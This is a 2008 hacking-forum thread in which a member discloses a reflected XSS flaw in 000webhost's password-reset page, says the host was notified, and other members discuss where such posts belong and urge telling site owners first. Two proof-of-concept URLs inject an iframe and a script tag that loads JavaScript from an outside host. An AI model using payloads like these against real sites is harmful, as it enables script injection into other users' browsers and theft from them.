[XSS]000webhost

Producted · Post by **Producted** » 14 Oct 2008, 00:46

I don't know if this topic fits in this board, i couldn't find any board security releated. Just move or delete if it doesn't fit :p

Well, i was browsing around the website of my hosting, and i found something interesting, it's a XSS exploit.

Code: Select all

http://members.000webhost.com/forgot_password.php?msg=1&email=%3Ciframe%20src=http://producted.890m.com%20width=1024%20height=768%3E%3C/iframe%3E

As dinnerbone has more experience than me, his input is:

Code: Select all

http://members.000webhost.com/forgot_password.php?msg=1&email=%3Cscript%20src=http://www.dinnerbone.com/SOM/lolcode.js%3E%3C/script%3E

I have already contacted the staff about this. (Not patched yet)
<b>I'm not responsible for anything you'll do with it!</b>
__
Posted on my blog a few days ago (noobvision.tk)

str33tl0rd · Post by **str33tl0rd** » 14 Oct 2008, 01:59

i don't think it is even the right place to bring this issues up here....
couz with my experience in suck-o...its only a information purpose website...i don't think there is much you could get out of that....
Still the admins will deal with it....

Post by **computathug** » 14 Oct 2008, 03:37

Relax streetlord. Nice find producted. This is a hacking forum after all. I am glad you did the right thing and contacted the admin. As you know this is not a site for malicious activity but we do have a section in the backroom for exploits. As this is to do with hacking it can stay here for now as you dont have access to the backroom yet. The backroom is for valued members that have been around a bit, have a good post count of decent informational posts and is for people that have passed the suck-o morality test (if the staff feel the person is suitable).

Please introduce yourself producted here

http://www.suck-o.com/modules.php?name= ... topic&t=26

Welcome to suck-o, hope you enjoy your stay and can contribute more to our community

str33tl0rd · Post by **str33tl0rd** » 14 Oct 2008, 04:29

i told you the admins will do the job....
i was still right...its not really right place....

Producted · Post by **Producted** » 14 Oct 2008, 08:09

I was looking for the introduction page but i couldn't find it

Thanks

Post by **Gogeta70** » 14 Oct 2008, 12:04

str33tl0rd wrote:i told you the admins will do the job....
i was still right...its not really right place....

I'm not catching on here. You say this isn't the right place?

Isn't finding a vulnerability in a web application that is believed to be secure by it's designers/users considered a form of 'hacking'? I say leave it be, it's fine where it's at.

By the way, nice find, producted!

Post by **ayu** » 14 Oct 2008, 12:15

Just as a side note, and addition to Gogeta's thread...

We support any kind of hacking activity that is not malicious or unethical. Found an exploit in a site? show it! and discuss it! but at inform the owners of the site first so that they will get a chance to fix it

Any kind of hacking that is productive in a way that makes you learn without making life harder for others, is welcome here.

Producted · Post by **Producted** » 14 Oct 2008, 23:54

This exploit is found 3 days ago, before i even posted it on my blog i noted the staff about it. Or they don't care, or they don't have the time to patch it.